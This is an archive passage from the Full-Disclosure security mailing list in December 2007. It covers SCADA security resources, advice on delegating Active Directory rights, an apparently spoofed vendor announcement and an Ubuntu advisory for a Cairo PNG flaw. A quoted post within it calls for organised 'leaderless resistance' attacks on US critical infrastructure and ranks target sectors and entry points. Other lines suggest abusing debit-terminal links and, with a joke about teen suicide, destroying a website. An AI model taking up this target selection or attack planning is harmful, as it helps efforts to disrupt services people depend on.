Well, assuming it was Wonderware (http://us.wonderware.com) since in
multiple networks of hundreds of thousands of nodes, and the companies
that own them... Wonderware was the only SCADA related package that
creeped up.

On a different and amusing note, X.25 was still in use in a number of
these locations. Take that for what you will, but I don't think that's a
good sign. Hello, Datapac! However I have little idea what the X.25
landscape is like anymore.  Would be interesting if both
credit/financial and infrastructure data regularly travelled over the
same paths. Get access to a lottery/debit terminal, or just its
connectivity, and leverage that.

24th Chaos Communication Congress "Hacking SCADA", it sure would be nice
to make it over:
  http://events.ccc.de/congress/2007/Fahrplan/events/2227.en.html

More amusement, though it's a subscription site:
  http://www.digitalbond.com/wiki/index.php/SCADA_IDS_Signatures

Anyone have any resources they'd care to share?



From dudevanwinkle at gmail.com  Mon Dec  3 01:04:42 2007
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Sun, 2 Dec 2007 20:04:42 -0500
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: <23107.1196629450@turing-police.cc.vt.edu>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
	<16569.1196623374@turing-police.cc.vt.edu>
	<8a6b8e350712021134l72100737o143d1d7e5367f8e@mail.gmail.com>
	<20494.1196626985@turing-police.cc.vt.edu>
	<2d6724810712021232n74f452d1q45a90ea989375787@mail.gmail.com>
	<23107.1196629450@turing-police.cc.vt.edu>
Message-ID: <e024ccca0712021704n790c47ffne534da86a6ba8e72@mail.gmail.com>

On Dec 2, 2007 4:04 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> On Sun, 02 Dec 2007 15:32:22 EST, T Biehn said:
> > Clearly stated, he was cleaning up DOMAIN Administrators, which can,
> > you know, Administer all the computers on the domain.
>
> What, you don't think that some people are unfortunate enough to be newcomers
> to the field, and their first assignment is to clean up a net that an even
> less clued predecessor set up with 'users-as-domain-admins' because the
> previous guy didn't know the difference between -as-admin and -as-domain-admin?
>
> Keep in mind that we were *all* that clueless at one time.  For some of us,
> it was 30 years ago, for others it's 30 hours ago.

Anyone who was a security expert 30 yrs ago should be ridiculed. Their
job description was "I inspect all 5 & 1/4 disks that get mailed to
us" and should be a reason NOT to hire them :-P

> > I guess we'll all just denounce our friend here for even thinking he
> > could ask a question as STUPID and RIDICULOUS as this one, instead of
> > actually knowing or thinking about one could do.

Whatever, just add a local account that has write access to
c:\progra~1\ and HKLM/Software, and grant the users read access to the
same (xcacls and regedt32 + logon.bat will do this for you) and you
are good.

-JP



From tbiehn at gmail.com  Mon Dec  3 01:46:23 2007
From: tbiehn at gmail.com (T Biehn)
Date: Sun, 2 Dec 2007 20:46:23 -0500
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: <e024ccca0712021704n790c47ffne534da86a6ba8e72@mail.gmail.com>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
	<16569.1196623374@turing-police.cc.vt.edu>
	<8a6b8e350712021134l72100737o143d1d7e5367f8e@mail.gmail.com>
	<20494.1196626985@turing-police.cc.vt.edu>
	<2d6724810712021232n74f452d1q45a90ea989375787@mail.gmail.com>
	<23107.1196629450@turing-police.cc.vt.edu>
	<e024ccca0712021704n790c47ffne534da86a6ba8e72@mail.gmail.com>
Message-ID: <2d6724810712021746w14b60f4djfff57abc25d17cea@mail.gmail.com>

Wonderous suggestion Dude.
Apparently someone can't spot obvious sarcasm.


On Dec 2, 2007 8:04 PM, Dude VanWinkle <dudevanwinkle at gmail.com> wrote:
> On Dec 2, 2007 4:04 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> > On Sun, 02 Dec 2007 15:32:22 EST, T Biehn said:
> > > Clearly stated, he was cleaning up DOMAIN Administrators, which can,
> > > you know, Administer all the computers on the domain.
> >
> > What, you don't think that some people are unfortunate enough to be newcomers
> > to the field, and their first assignment is to clean up a net that an even
> > less clued predecessor set up with 'users-as-domain-admins' because the
> > previous guy didn't know the difference between -as-admin and -as-domain-admin?
> >
> > Keep in mind that we were *all* that clueless at one time.  For some of us,
> > it was 30 years ago, for others it's 30 hours ago.
>
> Anyone who was a security expert 30 yrs ago should be ridiculed. Their
> job description was "I inspect all 5 & 1/4 disks that get mailed to
> us" and should be a reason NOT to hire them :-P
>
> > > I guess we'll all just denounce our friend here for even thinking he
> > > could ask a question as STUPID and RIDICULOUS as this one, instead of
> > > actually knowing or thinking about one could do.
>
> Whatever, just add a local account that has write access to
> c:\progra~1\ and HKLM/Software, and grant the users read access to the
> same (xcacls and regedt32 + logon.bat will do this for you) and you
> are good.
>
> -JP
>



From joel at helgeson.com  Mon Dec  3 03:19:10 2007
From: joel at helgeson.com (Joel R. Helgeson)
Date: Sun, 2 Dec 2007 21:19:10 -0600
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: <BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
Message-ID: <016701c8355b$46222cc0$d2668640$@com>

Launch "Active Directory Users & Computers"

Listed you have the AD containers used to hold all your objects, select a
tree, right-click the container, click properties. There is a tab called
"Delegate Control" where you can delegate management of the objects located
in that container to whatever groups or individuals you want.  It is best to
create a user group, then delegate the control to the group rather than the
user.


This is where it is important that you have your AD containers set up
properly.

 

Hope that helps provide some direction.

 

Joel Helgeson

 

 

From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of happy nino
Sent: Sunday, December 02, 2007 3:42 AM
To: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] need help in managing administrators

 

 

Hi All,
i've a problem in my organization that we have several domain admins, we are
in the process of removing most of them but i need to have a person only
authorized to install
new software to users' computers but without having access to other parts of
the users machines, is this possible ?..can i delegate a function like this
only to certain users with out
being domain admins?
Appreciate your great help
thanks alot 

regards,
Nad


 

 

  _____  

Get closer to the jungle. I'm a Celebrity Get Me Out Of Here!
<http://entertainment.uk.msn.com/tv/realitytv/im-a-celebrity/> 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071202/8b63cc82/attachment.html 

From varcher at denyall.com  Mon Dec  3 09:59:47 2007
From: varcher at denyall.com (Vincent Archer)
Date: Mon, 03 Dec 2007 10:59:47 +0100
Subject: [Full-disclosure] High Value Target Selection
In-Reply-To: <28972.1196573057@turing-police.cc.vt.edu>
References: <47505E42.90503@rogers.com>
	<4ef5fec60711302127i3e7baef0vf055d8a6592a5ee7@mail.gmail.com>
	<47518753.9030006@rogers.com>
	<4ef5fec60712011536t79f77c51x918090aae280405c@mail.gmail.com>
	<475230EB.2030404@rogers.com>
	<28972.1196573057@turing-police.cc.vt.edu>
Message-ID: <1196675987.5420.16.camel@dapcva>


On Sun, 2007-12-02 at 06:24 +0100, Valdis.Kletnieks at vt.edu wrote:
> On Sat, 01 Dec 2007 23:13:31 EST, gmaggro said:
> > Ah yes, I remember an old story not too dissimilar... multiple redundant
> > lines, all severed at the same time with the same backhoe. Idiots.
> 
> To be fair, it's often not "idiots".

Sometimes, it *IS* idiots. In 1987, I was working on a telecoms-based
business (French Minitel). We got about $20,000 per hour revenue tied to
the X25 lines coming in, which meant a service interruption of an hour
was bad, any service that would last a week would be death to the
business (it was also highly competitive - if you were offline for a
week, a lot of customers would find another service).

So we went to our provider France Telecom (there wasn't a choice: there
was one state provider for telco, and that was it), and we said "ok, we
need a set of backup lines in case the current set gets cut". "No
problem, our engineer will be there on Monday to install the modem and
check your connection". "Hmmm? Where does the backup line go thru?"
"Why, the same trunk, we've got plenty of spare capacity in it".

Took us two months of careful negotiation to explain in words of no more
than 5 letters that when we said backup in case of cut lines, we really
meant it.

-- 
Vincent ARCHER
varcher at denyall.com

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 23, rue Notre Dame des Victoires - 75002 Paris - France




From SMAKOUS1 at Fairview.org  Mon Dec  3 12:47:54 2007
From: SMAKOUS1 at Fairview.org (Makousky, Steve C)
Date: Mon, 3 Dec 2007 06:47:54 -0600
Subject: [Full-disclosure] unsubscribe full-disclosure
In-Reply-To: <016701c8355b$46222cc0$d2668640$@com>
Message-ID: <5DFB65ACD9B42B49AB64D7C5F6962977074568C7@digsmxmbx08.Fairview.org>

unsubscribe full-disclosure
 
----------------------------------
Steve Makousky CISSP, CNE, MCP
Fairview Health Services
Lead Information Security Analyst
smakous1 at fairview.org
W # - 612.672.6788
P # -
00110110 00110001 00110010 00101110 00110110 00110001
00110011 00101110 00110110 00111001 00110011 00111001
----------------------------------

 

________________________________

From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Joel R.
Helgeson
Sent: Sunday, December 02, 2007 9:19 PM
To: 'happy nino'; bugtraq at securityfocus.com;
full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] need help in managing administrators



Launch "Active Directory Users & Computers"

Listed you have the AD containers used to hold all your objects, select
a tree, right-click the container, click properties. There is a tab
called "Delegate Control" where you can delegate management of the
objects located in that container to whatever groups or individuals you
want.  It is best to create a user group, then delegate the control to
the group rather than the user.


This is where it is important that you have your AD containers set up
properly...

 

Hope that helps provide some direction...

 

Joel Helgeson

 

 

From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of happy
nino
Sent: Sunday, December 02, 2007 3:42 AM
To: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] need help in managing administrators

 

	 

	Hi All,
	i've a problem in my organization that we have several domain
admins, we are in the process of removing most of them but i need to
have a person only authorized to install
	new software to users' computers but without having access to
other parts of the users machines, is this possible ?..can i delegate a
function like this only to certain users with out
	being domain admins?
	Appreciate your great help
	thanks alot 
	
	regards,
	Nad
	
	
	 

 

________________________________

Get closer to the jungle. I'm a Celebrity Get Me Out Of Here!
<http://entertainment.uk.msn.com/tv/realitytv/im-a-celebrity/> 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071203/c8884b3f/attachment.html 

From isbackgobbles at googlemail.com  Mon Dec  3 14:00:06 2007
From: isbackgobbles at googlemail.com (Gobbles is back)
Date: Mon, 3 Dec 2007 14:00:06 +0000
Subject: [Full-disclosure] Phioust is dead, long live Matasano !!!
Message-ID: <679de8620712030600s132a7bb9g4b188f1d39a5bf15@mail.gmail.com>

Right,

Thanks to decent people and support on Full Disclosure, Lionel *Phioust *the
lovable idiot is history now !!!

Neways, time for some new updates. Our blog
http://isbackgobbles.blogspot.com will be up shortly. Yes our  team is
really working hard to upload funny replies to Turbo codes, pills, moron
research and all that ..

Thanks,

Gunnery Sargent
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071203/48fa452d/attachment.html 

From dudevanwinkle at gmail.com  Mon Dec  3 18:37:09 2007
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Mon, 3 Dec 2007 13:37:09 -0500
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: <2d6724810712021746w14b60f4djfff57abc25d17cea@mail.gmail.com>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
	<16569.1196623374@turing-police.cc.vt.edu>
	<8a6b8e350712021134l72100737o143d1d7e5367f8e@mail.gmail.com>
	<20494.1196626985@turing-police.cc.vt.edu>
	<2d6724810712021232n74f452d1q45a90ea989375787@mail.gmail.com>
	<23107.1196629450@turing-police.cc.vt.edu>
	<e024ccca0712021704n790c47ffne534da86a6ba8e72@mail.gmail.com>
	<2d6724810712021746w14b60f4djfff57abc25d17cea@mail.gmail.com>
Message-ID: <e024ccca0712031037s6d92ffa4kf8a4b548a3f6a97f@mail.gmail.com>

On Dec 2, 2007 8:46 PM, T Biehn <tbiehn at gmail.com> wrote:
> Wonderous suggestion Dude.
> Apparently someone can't spot obvious sarcasm.


I do have a deficiency in that area.. or are you being sarcastic again?



From dudevanwinkle at gmail.com  Mon Dec  3 18:49:42 2007
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Mon, 3 Dec 2007 13:49:42 -0500
Subject: [Full-disclosure] Web Beam,
	the new concept web application penetration testing tool
In-Reply-To: <200712020018.lB20HIDD026004@openbsd.nyi.net>
References: <200712020018.lB20HIDD026004@openbsd.nyi.net>
Message-ID: <e024ccca0712031049o2dfcfe6dhf9df4128b9ce383b@mail.gmail.com>

NSFW!! But funny :-)

Just FYI :-)

Received-SPF: softfail (lists.grok.org.uk: transitioning domain of
	Billy.Hoffman at spidynamics.com does not designate 66.111.2.36 as
	permitted sender)
Received: from openbsd.nyi.net (openbsd.nyi.net [66.111.2.36])
	by lists.grok.org.uk (Postfix) with ESMTP id 3A6BCCB8
	for <full-disclosure at lists.grok.org.uk>;
	Sun,  2 Dec 2007 00:19:06 +0000 (GMT)


On Dec 1, 2007 7:18 PM,  <Billy.Hoffman at spidynamics.com> wrote:
>
> We are pleased to announce the result of the strategical partnership between SPI Dynamics and CORE SECURITY INC .
> Paul Paget's security staff worked closely with us to integrate core impact security engine into our new Web Beam web application penetration testing tool.
> Web Beam deliveries top level results in automatic web application discovery and in this new technology, the exploiting.
> The platform includes an opensource licenced SDK to provide assistance in manual web vulnerability analysis that will be released on December 7th
> on our website.
> Web Beam includes 0day techniques for web attacks against well known enterprise grade applications widely found in intranet penetration tests.
> To get an overview of the feature set of Web Beam and to signup for the Beta Testing Program download the presentation available on
> http://beam.to/WebPresentation2007.pdf
>
>
> Billy Hoffman
> --
> Lead Researcher, SPI Labs
> SPI Dynamics, An HP Company
> http://www.spidynamics.com
> Phone:  678-781-4800
> Direct:   678-781-4845
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From elazarb at earthlink.net  Mon Dec  3 16:40:17 2007
From: elazarb at earthlink.net (Elazar Broad)
Date: Mon, 3 Dec 2007 11:40:17 -0500 (EST)
Subject: [Full-disclosure] SCADA refresher
Message-ID: <26043523.1196700017263.JavaMail.root@elwamui-cypress.atl.sa.earthlink.net>

This is interesting: http://www.schneier.com/blog/archives/2007/05/scada_security.html
About a year ago, Nessus released plugins for testing SCADA systems: http://blog.tenablesecurity.com/2006/12/nessus_3_scada_.html
And SANS is always a good resource: http://www.sans.org/reading_room/whitepapers/warfare/1644.php

Elazar 



From dudevanwinkle at gmail.com  Mon Dec  3 19:51:30 2007
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Mon, 3 Dec 2007 14:51:30 -0500
Subject: [Full-disclosure] SCADA refresher
In-Reply-To: <47535341.6060206@rogers.com>
References: <47505E42.90503@rogers.com> <47535341.6060206@rogers.com>
Message-ID: <e024ccca0712031151xd8453fdm9c376f38583fb639@mail.gmail.com>

Also Johnson Controls

in 2005 they were busy converting the proprietary BACnet speaking
SCADA devices to embedded windows XP, considering NASA and friends run
JCI, and there is no good way to update embedded XP (AFAIK) remotely,
these systems should be prime targets...

Whats an MLP?

-JP

On Dec 2, 2007 7:52 PM, gmaggro <gmaggro at rogers.com> wrote:
> Been giving myself a little refresher on SCADA, hope no-one minds the MLP.
>
> Stock presentation on SCADA security issues:
>
> http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf
>
> Ganesh Devarajan's Defcon presentation was interesting:
>   http://video.google.com/videoplay?docid=2434649448102709100&hl=en
>
> Makes of SCADA and related products I have seen in actual use:
>   Allen Bradley (hardware)
>   Siemens       (hardware)
>   RAND          (hardware)
>   ABB           (hardware)
>   Wonderware    (software, assuming this was what Ganesh was assaulting)
>
> Well, assuming it was Wonderware (http://us.wonderware.com) since in
> multiple networks of hundreds of thousands of nodes, and the companies
> that own them... Wonderware was the only SCADA related package that
> creeped up.
>
> On a different and amusing note, X.25 was still in use in a number of
> these locations. Take that for what you will, but I don't think that's a
> good sign. Hello, Datapac! However I have little idea what the X.25
> landscape is like anymore.  Would be interesting if both
> credit/financial and infrastructure data regularly travelled over the
> same paths. Get access to a lottery/debit terminal, or just its
> connectivity, and leverage that.
>
> 24th Chaos Communication Congress "Hacking SCADA", it sure would be nice
> to make it over:
>   http://events.ccc.de/congress/2007/Fahrplan/events/2227.en.html
>
> More amusement, though it's a subscription site:
>   http://www.digitalbond.com/wiki/index.php/SCADA_IDS_Signatures
>
> Anyone have any resources they'd care to share?
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From reepex at gmail.com  Mon Dec  3 19:53:36 2007
From: reepex at gmail.com (reepex)
Date: Mon, 3 Dec 2007 13:53:36 -0600
Subject: [Full-disclosure] High Value Target Selection
In-Reply-To: <47505E42.90503@rogers.com>
References: <47505E42.90503@rogers.com>
Message-ID: <e9d9d4020712031153m284f9548g40f29fc07efc193b@mail.gmail.com>

you should destroy myspace.com

after the downfall of and removal of myspace, many emo kids and future
teenage moms will commit sucide saving the world from future jerry springer
episodes and adding to the list of an heroes

On 11/30/07, gmaggro <gmaggro at rogers.com> wrote:
>
> I think it'd be interesting if we started a discussion on the selection
> of high value targets to be used in the staging of attacks that damage
> significant infrastructure. The end goals, ranked equal in importance,
> would be as follows:
>
> 1. To bring like minded people together while operating under the
> strategy of 'leaderless resistance'
> (http://en.wikipedia.org/wiki/Leaderless_resistance)
>
> 2. To be the 'aboveground' partner to the 'underground' scene, or at
> least serve to distract authorities from the activities of underground
> groups
>
> 3. To see exactly what can be accomplished, and accomplish it
>
> 4. To capture the imagination of the public
>
> The 'leaderless resistance' aspect of organization is going to be key.
> Plenty of technology exists for encryption and anonymity but that
> doesn't apply to people. We have to be like the Internet itself here, as
> originally intended: able to take the largest of blows and route around
> the damage automatically. We also have to be like good encryption: able
> to expose everything about our mechanism without leading to compromise.
>
> Capturing the imagination of the public sounds like bizspeek bullshit,
> but it's a very powerful tool - it only takes one cow to start a
> stampede. Furthermore it serves as a useful discriminator in selecting
> targets. Bringing down Facebook or Amazon might annoy people... but it
> really gets driven home when they can't pay their bills, buy food from
> supermarkets, or take the train to work.
>
> So, types of infrastructure to attack:
>
> 1. Transportation
> 2. Financial
> 3. Telecommunications
> 4. Petrochemical
> 5. Manufacturing
> 6. Health care
> 7. Education
> 8. Civilian Law Enforcement
> 9. Government (Judicial, Executive, Legislative)
> 10. Military
>
> This is just what I've thought of to date. One thing we'll need to do is
> prioritize that list and flesh it out. For instance, for 'Financial' I'd
> be inclined to break up something like this: banks, credit card
> companies, credit processing companies, ATM companies, credit bureaus,
> collection agencies, investment firms, etc.
>
> I guess we should pick some kind of a nation-state to narrow the scope.
> I'm going to propose the USA for several reasons:
>
> 1. Alot of folks got it in for them. This makes it easier to blend into
> the background. There's also the potential for assistance via
> enemy-of-my-enemy-is-my-friend co-operation among like minded
> individuals and groups. Also, in security, the advantage always goes to
> the attacker; he only needs to be successful once but the defender has
> to suceed every time. And since they're no doubt getting assaulted left
> right and centre they've probably been tenderized pretty good. These
> factors, I believe, combine to nullify any advantage they might have
> from being well practiced at having to withstand assaults.
>
> 2.They're weak right now. In many ways. Given the issues in the
> sub-prime market and it's cascade effects, profits are down everywhere.
> When businesses lose money, what's the first thing that suffers?
> Customer service. What's the second thing? Security. Not trying to slant
> politically one way or the other here, but the American implementation
> of capitalism is not renowned for having led to people making quality
> goods or loving their jobs. Sloppiness abounds whether it's ACLs on the
> router or easy-to-social-engineer employees. The effects of more people
> losing their jobs and increased sociocultural turmoil will only
> exacerbate this. Alot of talented people will be out a job for reason of
> economics or colour, and if engaged properly, can add to the ranks.
>
> 3. They're easy to penetrate. If you can't walk right into the states
> over the Mexican or Canadian border, then there's a million lines of
> fibre and copper running straight in. It is an incredibly well connected
> place with a widely geographically dispersed populace. And alot of
> coffee shops near open wifi. Entire cities blanketed in connectivity
> accessible from back alleys, washrooms in malls, or remote corners of
> public parks with a 12db Yagi. Miles upon miles of SCADA wiring.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071203/9a4a8315/attachment.html 

From dudevanwinkle at gmail.com  Mon Dec  3 20:49:17 2007
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Mon, 3 Dec 2007 15:49:17 -0500
Subject: [Full-disclosure] Anyone have a reason for 2x the email flow today?
Message-ID: <e024ccca0712031249t47708080u3de310cc327f89d8@mail.gmail.com>

My servers are slammed...

Anyone else notice anything?

-JP



From kees at ubuntu.com  Mon Dec  3 21:42:42 2007
From: kees at ubuntu.com (Kees Cook)
Date: Mon, 3 Dec 2007 13:42:42 -0800
Subject: [Full-disclosure] [USN-550-1] Cairo vulnerability
Message-ID: <20071203214242.GO8789@outflux.net>

=========================================================== 
Ubuntu Security Notice USN-550-1          December 03, 2007
libcairo vulnerability
CVE-2007-5503
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libcairo2                       1.0.4-0ubuntu1.1

Ubuntu 6.10:
  libcairo2                       1.2.4-1ubuntu2.1

Ubuntu 7.04:
  libcairo2                       1.4.2-0ubuntu1.1

Ubuntu 7.10:
  libcairo2                       1.4.10-1ubuntu4.1

After a standard system upgrade you need to restart your session to effect
the necessary changes.

Details follow:

Peter Valchev discovered that Cairo did not correctly decode PNG image data.
By tricking a user or automated system into processing a specially crafted
PNG with Cairo, a remote attacker could execute arbitrary code with user
privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.0.4-0ubuntu1.1.diff.gz
      Size/MD5:    21363 923fce5eeadd28210253d4abee94c021
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.0.4-0ubuntu1.1.dsc
      Size/MD5:      758 1a9841f672270e575c0b969ac43770e6
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.0.4.orig.tar.gz
      Size/MD5:  1475777 9002b0e69b3f94831a22d3f2a7735ce2

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-doc_1.0.4-0ubuntu1.1_all.deb
      Size/MD5:   248806 d07f34dfefa986bce48832d8045b7a91

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.0.4-0ubuntu1.1_amd64.deb
      Size/MD5:   379060 76ded810d17804925ad12bae5e3d245f
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.0.4-0ubuntu1.1_amd64.deb
      Size/MD5:   325530 9a516ba06e5b5a27e21b66bb4347078c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.0.4-0ubuntu1.1_i386.deb
      Size/MD5:   349700 ee50215cd08bf62e31cda8f17c5799f4
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.0.4-0ubuntu1.1_i386.deb
      Size/MD5:   305972 55d2c047477e179c5ac7dc67ab376aa4

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.0.4-0ubuntu1.1_powerpc.deb
      Size/MD5:   358682 fdf4b2bad4b64ab465869bced8865ba0
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.0.4-0ubuntu1.1_powerpc.deb
      Size/MD5:   310390 cdfd66c03c826f73090c230afb4fe9ec

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.0.4-0ubuntu1.1_sparc.deb
      Size/MD5:   344788 ff7a4c0a0c9d7a357412156dc9871577
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.0.4-0ubuntu1.1_sparc.deb
      Size/MD5:   299764 daf1419acbbf7dc92d395ffbe00fa65c

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.2.4-1ubuntu2.1.diff.gz
      Size/MD5:    24719 bcd1d3e83c5582aa19ebca95a24127a3
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.2.4-1ubuntu2.1.dsc
      Size/MD5:      896 932452487483a9eb21ebef4a44f2fc82
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.2.4.orig.tar.gz
      Size/MD5:  2882781 1222b2bfdf113e2c92f66b3389659f2d

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-doc_1.2.4-1ubuntu2.1_all.deb
      Size/MD5:   299204 8d7d5a9983fb53561516082dcbd08bd6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.2.4-1ubuntu2.1_amd64.deb
      Size/MD5:   416736 a5c36bbdb028235421ef125a6402487e
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.2.4-1ubuntu2.1_amd64.deb
      Size/MD5:   356570 092a386f6376547f3bb8ce7ce32b485b
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.2.4-1ubuntu2.1_amd64.deb
      Size/MD5:   471368 3b8d4bfd594bc70b95cc41db13602af3
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.2.4-1ubuntu2.1_amd64.deb
      Size/MD5:   395646 b0c1fef7e375e2d6daf5e30755e084ee
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.2.4-1ubuntu2.1_amd64.udeb
      Size/MD5:   158518 26c98933ee1b5454910a0eb817bf8954

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.2.4-1ubuntu2.1_i386.deb
      Size/MD5:   399522 766ec4b85a287ff9aa4e166ba18b40a1
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.2.4-1ubuntu2.1_i386.deb
      Size/MD5:   348112 ce9ca18e10e1aece9aa5c2ae328e803b
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.2.4-1ubuntu2.1_i386.deb
      Size/MD5:   446278 200d50c73cc849e061ed94c4bbd10895
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.2.4-1ubuntu2.1_i386.deb
      Size/MD5:   385436 668a20054d0c1a507ebcfc3010432639
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.2.4-1ubuntu2.1_i386.udeb
      Size/MD5:   150094 8a06ce6c6b8869b141c45d8507e3d376

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.2.4-1ubuntu2.1_powerpc.deb
      Size/MD5:   400866 7342cc89dd8937eaee61eb5f4de2d09a
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.2.4-1ubuntu2.1_powerpc.deb
      Size/MD5:   345188 f5ae6066dbef03c3acf524ef890d6da3
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.2.4-1ubuntu2.1_powerpc.deb
      Size/MD5:   455126 e78d418d23ec0a0a9ef62392f6970f82
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.2.4-1ubuntu2.1_powerpc.deb
      Size/MD5:   382980 6dc5a272d5611a181c328ec2fbac6173
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.2.4-1ubuntu2.1_powerpc.udeb
      Size/MD5:   146998 6f406f0fcb4f6638e13681704dde4af0

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.2.4-1ubuntu2.1_sparc.deb
      Size/MD5:   383676 cb664835cbfc7460922bb947f32fb372
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.2.4-1ubuntu2.1_sparc.deb
      Size/MD5:   333126 4493ce63b9596f0efcea952ed0e68580
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.2.4-1ubuntu2.1_sparc.deb
      Size/MD5:   431944 a48df7da812e0ab97eb4905c28bfee02
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.2.4-1ubuntu2.1_sparc.deb
      Size/MD5:   368906 8c723281873077a45359691886e656b8
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.2.4-1ubuntu2.1_sparc.udeb
      Size/MD5:   135074 0ceca57c8f30bb224c867153ac1f5a13

Updated packages for Ubuntu 7.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.4.2-0ubuntu1.1.diff.gz
